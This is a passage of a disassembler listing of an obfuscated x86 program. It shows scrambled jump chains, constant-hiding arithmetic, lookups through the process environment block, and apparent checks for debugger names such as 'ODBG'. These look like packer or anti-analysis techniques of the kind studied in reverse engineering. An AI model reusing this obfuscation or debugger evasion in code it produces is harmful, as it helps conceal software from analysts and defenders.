loc_42B587: ; CODE XREF: sub_4284E7+15�j
jmp loc_42D581
; END OF FUNCTION CHUNK FOR sub_4284E7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D02D
loc_42B58D: ; CODE XREF: sub_42D02D-572C�j
jmp nullsub_125
; END OF FUNCTION CHUNK FOR sub_42D02D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42561D
loc_42B592: ; CODE XREF: sub_42561D-14D1�j
jmp loc_42E262
; END OF FUNCTION CHUNK FOR sub_42561D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42B597: ; CODE XREF: sub_425DA5-551�j
call sub_42892E
jmp loc_4275E2
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B5A1: ; CODE XREF: sub_42798F:loc_42591C�j
shr edx, 3
push 6295DF70h
pop ecx
rol ecx, 19h
jnb loc_424B57
xchg ebp, ecx
jmp loc_42E72C
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_42B5BA: ; CODE XREF: sub_427DA9-4228�j
and ebx, edx
jmp loc_42A326
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
loc_42B5C1: ; CODE XREF: _0182ofla:004259F4�j
cdq
; =============== S U B R O U T I N E =======================================
sub_42B5C2 proc near ; CODE XREF: sub_429597+3C27�p
; FUNCTION CHUNK AT 0042CECF SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push eax
jmp loc_42CECF
sub_42B5C2 endp
; =============== S U B R O U T I N E =======================================
sub_42B5CC proc near ; CODE XREF: _0182ofla:00425210�j
; sub_423127+BB2F�p
; FUNCTION CHUNK AT 0042A08D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3E2 SIZE 0000000C BYTES
mov [esp+0], ebx
pop ebx
push ecx
push 89DF4C11h
pop ecx
or ecx, 7DFC2C6Dh
add ecx, 43B9C583h
add ecx, ebp
jmp loc_42A08D
sub_42B5CC endp
; ---------------------------------------------------------------------------
loc_42B5EA: ; CODE XREF: _0182ofla:0042AFED�j
or [ecx+edx], al
mov eax, [ebp-0Ch]
push eax
push 18DC73EEh
jmp loc_427C92
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E42
loc_42B5FB: ; CODE XREF: sub_427E42:loc_425A32�j
add eax, 7383B048h
popf
push eax
push eax
push 0DC2A0956h
pop eax
sub eax, 48DA0814h
add eax, 6CF286D7h
jmp loc_42C6A0
; END OF FUNCTION CHUNK FOR sub_427E42
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42B61B: ; CODE XREF: sub_425DA5:loc_428696�j
add ebx, 5E02E2D3h
xor ebx, 0E00B0CC4h
add ebx, 22DE80BEh
xchg ebx, [esp+4+var_4]
jmp sub_42E2EE
; END OF FUNCTION CHUNK FOR sub_425DA5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42B636: ; CODE XREF: sub_428F20+3�j
jmp loc_42A14C
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428176
loc_42B63B: ; CODE XREF: sub_428176-1E84�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_428176
; =============== S U B R O U T I N E =======================================
sub_42B640 proc near ; DATA XREF: _0182ofla:00426D2A�o
add edi, 5869CCA5h
xchg edi, [esp+0]
jmp loc_42AF52
sub_42B640 endp
; ---------------------------------------------------------------------------
db 68h ; h
db 0D8h ; Ø
db 88h ; ˆ
db 49h ; I
db 1
db 58h ; X
db 81h ;
db 0C0h ; À
db 9Eh ; ž
db 0FCh ; ü
db 0D3h ; Ó
db 69h ; i
db 68h ; h
db 0ADh ; OFF32 SEGDEF [_0182ofla,42CFAD]
db 0CFh ; Ï
db 42h ; B
db 0
db 0E9h ; é
db 4Ah ; J
db 0C6h ; Æ
db 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_42B664: ; CODE XREF: _0182ofla:loc_42ADA5�j
mov edi, 2C6460ABh
; =============== S U B R O U T I N E =======================================
sub_42B669 proc near ; CODE XREF: sub_42798F+13F9�p
; FUNCTION CHUNK AT 00423ADA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004244C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424985 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042551A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00427C65 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00428B8A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042989C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042B136 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C839 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042CEC6 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042D8B9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042E0E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E371 SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_423ADA
sub_42B669 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42B67E: ; CODE XREF: sub_423A2A:loc_423515�j
jnz loc_426037
loc_42B684: ; CODE XREF: sub_4284E7-40D6�j
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
not eax
jmp loc_42602B
; ---------------------------------------------------------------------------
pushf
jmp loc_423B3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42B696: ; CODE XREF: sub_4271D2:loc_42505E�j
jz loc_429C31
jmp loc_42A11B
; END OF FUNCTION CHUNK FOR sub_4271D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42B6A2: ; CODE XREF: sub_4253F4+1E11�j
shr ecx, 16h
sbb ebx, esi
; END OF FUNCTION CHUNK FOR sub_4253F4
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42B6A7: ; CODE XREF: sub_428A39-37CA�j
and ebp, esi
popf
loc_42B6AA: ; CODE XREF: sub_4253F4:loc_423DD1�j
cmp ebx, 69727943h
jnz loc_42D629
jmp loc_429CDF
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_42B6BB: ; CODE XREF: sub_42E689-41E4�j
ja loc_425E3F
ja loc_42A044
and edx, 1CDCA05Eh
shr edx, 17h
jmp loc_4250DA
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42B6D5: ; CODE XREF: sub_42B15E:loc_42437E�j
jge loc_424C4D
loc_42B6DB: ; CODE XREF: sub_423AB1+F�j
jmp loc_42405E
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
sbb esi, 0C69276CEh
jmp loc_424C4C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42B6EB: ; CODE XREF: sub_42326C:loc_42ADBB�j
xor eax, 0DCE2C192h
add eax, ebp
add eax, 0B91EB147h
push eax
mov eax, [ebp-4]
push eax
call sub_428176
jmp loc_42E063
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
loc_42B708: ; DATA XREF: sub_427E32+6�o
mov edx, [ebp-14h]
shr edx, 3
mov ecx, ds:dword_423190
or [ecx+edx], al
push 78CA98F8h
jmp loc_4257ED
; ---------------------------------------------------------------------------
locret_42B721: ; CODE XREF: _0182ofla:00423A18�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429038
loc_42B722: ; CODE XREF: sub_429038+335D�j
jmp loc_4236DA
; END OF FUNCTION CHUNK FOR sub_429038
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423EB3
loc_42B727: ; CODE XREF: sub_423EB3+12�j
push 44845FCBh
pop esi
add esi, 0BBBE5921h
mov esi, [esi]
xchg esi, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_423EB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42B739: ; CODE XREF: sub_42C379+8�j
jmp loc_42B321
; END OF FUNCTION CHUNK FOR sub_42C379
; =============== S U B R O U T I N E =======================================
sub_42B73E proc near ; DATA XREF: sub_42CAC9+9�o
var_8 = dword ptr -8
push 0
push 3E4383F9h
add [esp+8+var_8], 0C1BC7C07h
lea eax, [ebp-4]
push eax
call sub_42371C
push eax
push offset loc_426FFE
jmp nullsub_108
sub_42B73E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42B760: ; CODE XREF: sub_428D63:loc_42C75E�j
mov [edi], eax
jmp loc_42AF29
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42B767: ; CODE XREF: sub_42660C+D81�j
push eax
push edx
push 6AA45DD0h
pop edx
add edx, 959E1414h
xchg edx, [esp+0]
jmp loc_42812D
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
mov edx, 710DA469h
call sub_42D71D
call sub_429FF9
jmp loc_42555D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_42B791: ; CODE XREF: sub_423AF2+46C2�j
jz loc_42AE9D
and ebx, ecx
shl ebp, 4
test ebx, eax
jmp loc_4265F8
; END OF FUNCTION CHUNK FOR sub_423AF2
; ---------------------------------------------------------------------------
loc_42B7A3: ; DATA XREF: sub_42EAB7-14AA�o
cmp dword ptr [ebp-1Ch], 66h
jnz loc_42D9FE
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42B7AD: ; CODE XREF: sub_42D9A4:loc_42C668�j
mov eax, 6
sub eax, [ebp+var_C]
jmp loc_42795C
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
locret_42B7BA: ; CODE XREF: _0182ofla:004249C9�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42B7BB: ; CODE XREF: sub_423A2A-5F9�j
jmp loc_425A13
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B7C0: ; CODE XREF: sub_42798F-1E5A�j
jnz loc_42CBE9
jmp loc_42AFDF
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42B7CB: ; CODE XREF: sub_42AAF8+42D2�j
mov edi, esi
pushf
loc_42B7CE: ; CODE XREF: sub_429C68:loc_42E463�j
call sub_428D17
; END OF FUNCTION CHUNK FOR sub_42AAF8
; START OF FUNCTION CHUNK FOR sub_424184
loc_42B7D3: ; CODE XREF: sub_424184:loc_4293C8�j
mov edx, 0D504D785h
push offset loc_426FF3
jmp nullsub_91
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42B7E2: ; CODE XREF: sub_427445-919�j
; sub_42DD86:loc_4293B2�j
push ecx
loc_42B7E3: ; CODE XREF: sub_42798F:loc_426397�j
push 0E2C3908Ah
pop ecx
add ecx, 1D7ED51Dh
push offset sub_4275A3
jmp loc_42898A
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_429D23
jmp loc_42C207
; ---------------------------------------------------------------------------
loc_42B80B: ; CODE XREF: _0182ofla:0042ADC5�j
test eax, ebx
jmp loc_4247A1
; ---------------------------------------------------------------------------
loc_42B812: ; CODE XREF: _0182ofla:loc_42A4AB�j
push edx
push eax
mov eax, [ebp-18h]
jmp loc_42333E
; ---------------------------------------------------------------------------
loc_42B81C: ; CODE XREF: _0182ofla:00429D68�j
add esp, 8
call sub_424080
; START OF FUNCTION CHUNK FOR sub_428BBF
loc_42B824: ; CODE XREF: sub_428BBF:loc_428BC4�j
xor [esi], edx
mov eax, 80000004h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_42415F
; END OF FUNCTION CHUNK FOR sub_428BBF
; ---------------------------------------------------------------------------
adc ecx, ebx
jmp sub_425AE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42B83D: ; CODE XREF: sub_425B6E:loc_427563�j
jz nullsub_89
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
call sub_42DDA6
loc_42B855: ; CODE XREF: _0182ofla:00427FB9�j
jmp loc_428CAC
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_42B85A: ; CODE XREF: sub_429242-2B91�j
jmp loc_42972D
; END OF FUNCTION CHUNK FOR sub_429242
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42B860 proc near ; CODE XREF: sub_42537E+2235�p
; _0182ofla:004291AA�j
; FUNCTION CHUNK AT 0042ECD0 SIZE 00000001 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 86220616h
push eax
call sub_42371C
jmp loc_42ECD0
sub_42B860 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42B875: ; CODE XREF: sub_428D63:loc_428B6E�j
lea eax, [ebp-2AAh]
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_423377
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281B9
loc_42B88C: ; CODE XREF: sub_4281B9:loc_42C11E�j
pop eax
and eax, 27A3D39h
xor eax, 417E6CEFh
push offset sub_42E585
jmp nullsub_92
; END OF FUNCTION CHUNK FOR sub_4281B9
; =============== S U B R O U T I N E =======================================
sub_42B8A3 proc near ; CODE XREF: _0182ofla:0042528C�j
; sub_42AC07-3049�p
xchg edx, [esp+0]
pop edx
mov edx, 0F75CA70h
call sub_42D71D
push 844AB399h
mov [esp+0], eax
jmp loc_42C119
sub_42B8A3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42B8BE: ; CODE XREF: _0182ofla:004256CE�j
; sub_4298DD-55E�j
add ebp, 3F9B2372h
loc_42B8C4: ; CODE XREF: _0182ofla:loc_42E959�j
call nullsub_8
retn
; ---------------------------------------------------------------------------
loc_42B8CA: ; CODE XREF: sub_4298DD+3104�j
jmp loc_42C8E9
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B8CF: ; CODE XREF: sub_42798F+23A4�j
jmp loc_428883
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_42B8D4: ; CODE XREF: sub_42938A-2786�j
jmp loc_42C351
; END OF FUNCTION CHUNK FOR sub_42938A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42B8DA: ; CODE XREF: sub_428F20-2AF4�j
jmp loc_42337C
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
db 9Dh
dword_42B8E0 dd 0F39C01BBh ; DATA XREF: sub_42A642-22D2�r
; sub_42A642+2790�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42B8E4: ; CODE XREF: sub_424184-EE0�j
jmp loc_42A543
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
db 23h, 1Eh, 89h
dword_42B8EC dd 77E75CB5h ; DATA XREF: _0182ofla:loc_424FE6�r
; sub_42D5EF-6EEC�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C2CC
loc_42B8F0: ; CODE XREF: sub_42C2CC+12B0�j
jmp nullsub_142
; END OF FUNCTION CHUNK FOR sub_42C2CC
; ---------------------------------------------------------------------------
db 72h, 0CBh, 0C3h
dword_42B8F8 dd 2 ; DATA XREF: sub_423861:loc_424471�r
; _0182ofla:0042575C�r ...
dd 3 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_42BCF8: ; CODE XREF: sub_4265C0+7�j
jmp loc_42C436
; END OF FUNCTION CHUNK FOR sub_4265C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42BCFD: ; CODE XREF: sub_428EB9-5C84�j
jmp loc_4240D3
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
dw 877Eh
dword_42BD04 dd 2 ; DATA XREF: sub_428205-272F�r
dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1
; ---------------------------------------------------------------------------
loc_42C104: ; CODE XREF: _0182ofla:00426B96�j
jmp loc_426D60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42C109: ; CODE XREF: sub_429E52-57C2�j
jmp loc_428634
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_42C10E: ; CODE XREF: sub_426319+8�j
sbb ecx, 0A742FED9h
call sub_42C998
loc_42C119: ; CODE XREF: sub_42B8A3+16�j
jmp loc_42C6CC
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281B9
loc_42C11E: ; CODE XREF: sub_4281B9+A�j
jmp loc_42B88C
; END OF FUNCTION CHUNK FOR sub_4281B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A42
loc_42C123: ; CODE XREF: sub_423A42+17A8�j
jmp locret_42CDE4
; END OF FUNCTION CHUNK FOR sub_423A42
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E44
loc_42C128: ; CODE XREF: sub_426E44-1EC0�j
jmp nullsub_93
; END OF FUNCTION CHUNK FOR sub_426E44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42C12D: ; CODE XREF: sub_4298DD-3AD8�j
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42C131: ; CODE XREF: sub_427445+7919�j
rol eax, 9
push eax
jmp nullsub_195
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42C13A: ; CODE XREF: sub_4282B8+CAA�j
jge loc_42D7CC
xchg ebx, [eax]
jmp loc_42D18C
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42C147: ; CODE XREF: sub_428F20:loc_42356F�j
xor eax, 0AE211247h
mov [ebp+0], eax
jmp loc_429A8B
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
loc_42C155: ; DATA XREF: sub_4233EC+7E42�o
push 4C200DCAh
pop ebx
sub ebx, 934E052Fh
and ebx, 0B82D2361h
test ebx, 40000000h
jmp loc_4268D3
; ---------------------------------------------------------------------------
loc_42C172: ; DATA XREF: sub_42537E+3977�o
push 814DC5D7h
mov eax, offset sub_425418
push offset loc_42540F
jmp loc_4295E1
; ---------------------------------------------------------------------------
loc_42C186: ; CODE XREF: _0182ofla:00425CD7�j
jnz loc_4237EA
jmp loc_42B1CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42C192: ; CODE XREF: sub_42E6BF+2DB�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42E6BF
; ---------------------------------------------------------------------------
locret_42C196: ; CODE XREF: _0182ofla:00423305�j
retn
; =============== S U B R O U T I N E =======================================
sub_42C197 proc near ; CODE XREF: sub_423395+4�p
; sub_42E1C8-7FA4�j ...
; FUNCTION CHUNK AT 0042359B SIZE 00000005 BYTES
jns sub_42310C
push ebp
jmp loc_42359B
sub_42C197 endp
; =============== S U B R O U T I N E =======================================
sub_42C1A3 proc near ; CODE XREF: _0182ofla:0042C29F�j
; sub_42B3C2+3176�p
xchg ebx, [esp+0]
pop ebx
call nullsub_10
retn
sub_42C1A3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A1D9
loc_42C1AD: ; CODE XREF: sub_42A1D9+10�j
jmp loc_423CED
; END OF FUNCTION CHUNK FOR sub_42A1D9
; =============== S U B R O U T I N E =======================================
sub_42C1B2 proc near ; CODE XREF: sub_4265C0�j
; FUNCTION CHUNK AT 00423748 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004239DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042443D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424744 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00424D90 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00425681 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425C2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D274 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042E938 SIZE 0000000E BYTES
push ebp
jmp loc_425C2D
sub_42C1B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42C1B9: ; CODE XREF: _0182ofla:00425874�j
jmp loc_42E2A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42C1BE: ; CODE XREF: sub_423A2A+7A06�j
push eax
push 0B568BE60h
pop eax
or eax, 9D7C7FF4h
jmp loc_426A87
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_42C1D1 proc near ; CODE XREF: sub_42D056-4749�p
; FUNCTION CHUNK AT 00425E5C SIZE 00000014 BYTES
call sub_42433C
loc_42C1D6: ; CODE XREF: sub_42705A:loc_427062�j
jmp loc_425E5C
sub_42C1D1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4243D3
loc_42C1DB: ; CODE XREF: sub_4243D3+29CB�j
jmp loc_42E299
; END OF FUNCTION CHUNK FOR sub_4243D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_42C1E0: ; CODE XREF: sub_4249FA+5148�j
call sub_428D17
push 0B9950870h
xchg esi, [esp+0]
mov edx, esi
pop esi
jmp loc_4254F7
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42C1F5: ; CODE XREF: sub_42798F:loc_425663�j
; sub_42798F-15EE�j
mov ecx, [ebp-1Ch]
and ecx, 7
mov eax, 1
shl eax, cl
jmp loc_42A059
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42C207: ; CODE XREF: _0182ofla:0042B806�j
jnz loc_42E9CC
jmp loc_42A872
; ---------------------------------------------------------------------------
loc_42C212: ; DATA XREF: sub_42798F:loc_428FC1�o
mov eax, [ebp-0Ch]
mov ecx, 3F5h
push offset loc_427BDB
jmp locret_42535F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C677
loc_42C224: ; CODE XREF: sub_42C677-8DE6�j
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
add ecx, 4
mov dword ptr [ecx], offset loc_42EA69
jmp loc_42A6CC
; END OF FUNCTION CHUNK FOR sub_42C677
; ---------------------------------------------------------------------------
loc_42C23F: ; DATA XREF: sub_424CE4+9�o
call sub_42D71D
push eax
ror eax, 8
push edi
push 0A1916F7Dh
pop edi
add edi, 5EB10AD7h
jmp loc_428692
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_42C25A: ; CODE XREF: sub_42AB3E:loc_423490�j
; sub_42AB3E-7559�j
call sub_429BB9
mov edx, 277EFE57h
call sub_42D71D
push eax
ror eax, 1Bh
mov ds:dword_42D240, eax
retn
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42C274: ; CODE XREF: sub_42380D+5064�j
jmp loc_42D150
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42417A
loc_42C279: ; CODE XREF: sub_42417A+5�j
jmp nullsub_95
; END OF FUNCTION CHUNK FOR sub_42417A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_42C27E: ; CODE XREF: sub_42AB3E:loc_429438�j
rol eax, 1Bh
jmp loc_425A2D
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_42C286: ; CODE XREF: sub_4289E4:loc_42DA92�j
cmp byte ptr [eax], 0
jnz loc_42E26D
push offset loc_427663
jmp loc_425A01
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
sbb ecx, 46700590h
jmp sub_42C1A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42C2A4: ; CODE XREF: sub_428A39:loc_42389B�j
push offset loc_42DF6B
jmp nullsub_121
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C2AE: ; CODE XREF: sub_423FCD-818�j
; sub_423FCD:loc_42C763�j
sub edx, ds:4000F2h
add edx, 817D6752h
xchg edx, [esp+0]
jmp sub_4265C0
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
jmp loc_4290CF
; ---------------------------------------------------------------------------
jmp loc_425CFF
; =============== S U B R O U T I N E =======================================
sub_42C2CC proc near ; CODE XREF: sub_42C9E6:loc_425831�j
; sub_423A2A:loc_42800B�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B8F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D56F SIZE 00000012 BYTES
push eax
xchg eax, ebp
mov ebp, eax
xchg eax, [esp+4+var_4]
jmp loc_42D56F
sub_42C2CC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42768C
loc_42C2D9: ; CODE XREF: sub_42768C+5BCD�j
pop ebx
pop ecx
